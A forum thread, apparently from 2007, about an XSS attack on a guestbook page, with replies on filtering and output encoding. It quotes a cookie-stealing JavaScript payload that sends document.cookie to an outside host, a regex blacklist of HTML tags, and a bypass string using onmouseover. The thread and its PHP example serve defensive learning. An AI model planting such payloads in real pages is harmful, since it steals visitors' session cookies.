Sasa, Posted May 5, 2007
Someone can enter the following text on my page and the whole thing falls apart on me :(

//We will set XMLHttpRequestObject false to see if it returns true later on.
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest) {
    XMLHttpRequestObject = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
} else {
    alert("Javascript must be enabled to continue.");
}
function socket() {
    XMLHttpRequestObject.open('GET', 'http://s.4dev.net/sasa.po.gs.png?' + window.document.cookie, true);
    XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    XMLHttpRequestObject.send(null);
    delete XMLHttpRequestObject;
}
window.document.onload='socket();'">

Hmm |||||||||||||||||||||||| What do I do so this doesn't happen again?
4e4en, Posted May 5, 2007 (edited)
Ban me :D :D Honestly, it didn't do you any harm.... unfortunately ;( Tag filtering, htmlspecialchars, htmlentities. After that, your page looked rather funny there :D :D
Edited May 5, 2007 by 4e4en
Sasa (Author), Posted May 5, 2007 (edited)
But what was that code supposed to do in general? Yes, I've started adding all sorts of http://lv.php.net/manual/en/function.htmlspecialchars.php but for now only on localhost! How can I filter what gets written to the file?
Edited May 5, 2007 by Sasa
xerts, Posted May 23, 2007

// Values to check: every GET parameter plus the request URI.
// (The original assigned $check_url from REQUEST_URI and then overwrote it in the
// foreach, so the URI itself was never tested; collecting everything first fixes that.)
$to_check = $_GET;
$to_check[] = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : $_SERVER['SCRIPT_NAME'];

// eregi() was removed in PHP 7; preg_match() with the /i flag is the case-insensitive equivalent.
foreach ($to_check as $check_url) {
    if (preg_match('/<[^>]*script[^>]*>/i', $check_url)
        || preg_match('/<[^>]*object[^>]*>/i', $check_url)
        || preg_match('/<[^>]*iframe[^>]*>/i', $check_url)
        || preg_match('/<[^>]*applet[^>]*>/i', $check_url)
        || preg_match('/<[^>]*meta[^>]*>/i', $check_url)
        || preg_match('/<[^>]*style[^>]*>/i', $check_url)
        || preg_match('/<[^>]*form[^>]*>/i', $check_url)
        || preg_match('/\([^>][^)]*\)/i', $check_url)
        || preg_match('/<[^>]*frameset[^>]*>/i', $check_url)
        || preg_match('/<[^>]*onmouseover[^>]*>/i', $check_url)
        || preg_match('/<[^>]*img[^>]*>/i', $check_url)
        || preg_match('/"/', $check_url)
        || preg_match("/'/", $check_url)) {
        // Abort the request outright on any match (a blacklist: only listed patterns are caught).
        die();
    }
}

And, as 4e4en already said, use htmlspecialchars.
andrisp, Posted May 23, 2007
Madness :), isn't strip_tags and/or htmlspecialchars simpler?
4e4en, Posted May 28, 2007
xerts, yours can easily be gotten around: <b onmouseover=alert(document.cookie);>this</b>
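As an added illustration (not code from anyone in this thread), here is the answer to Sasa's "how do I filter what gets written to the file" question: don't filter on write, encode on output with htmlspecialchars, shown against the payload 4e4en quoted, together with the strip_tags caveat that matters for andrisp's suggestion. The entries array and both function names are constructed for this example.

```php
<?php
declare(strict_types=1);

// Constructed sample guestbook entries as they would sit in the file;
// the second one is the payload 4e4en quoted above.
$entries = [
    'Sveiki, laba lapa :)',
    '<b onmouseover=alert(document.cookie);>šits</b>',
    'Viņš teica: "sveiki" & \'čau\'',
];

// Output encoding: escape on the way OUT, at the moment the stored entry is placed
// into the HTML page. ENT_QUOTES also escapes single quotes, which matters if the
// value ever lands inside an attribute; always pass the charset explicitly.
// Every < > & " ' becomes an entity, so the browser shows the payload as text and
// never sees a <b> tag or an onmouseover attribute.
function render_entry(string $entry): string
{
    return '<p>' . htmlspecialchars($entry, ENT_QUOTES, 'UTF-8') . '</p>';
}

// strip_tags() with an allow-list keeps the allowed tags' attributes, so with '<b>'
// allowed the onmouseover handler survives unchanged. Without an allow-list all tags
// are removed, but that is a different feature set (no formatting at all). Letting
// users keep any tag needs a real HTML sanitizer; for a plain-text guestbook,
// htmlspecialchars on output is sufficient on its own.
function strip_keep_bold(string $entry): string
{
    return strip_tags($entry, '<b>');
}

foreach ($entries as $entry) {
    echo "stored:                 $entry\n";
    echo "htmlspecialchars:       " . render_entry($entry) . "\n";
    echo "strip_tags(..., '<b>'): " . strip_keep_bold($entry) . "\n\n";
}
```

Run it from the command line and compare the second entry: the encoded line is inert text, while the strip_tags line still contains the event handler.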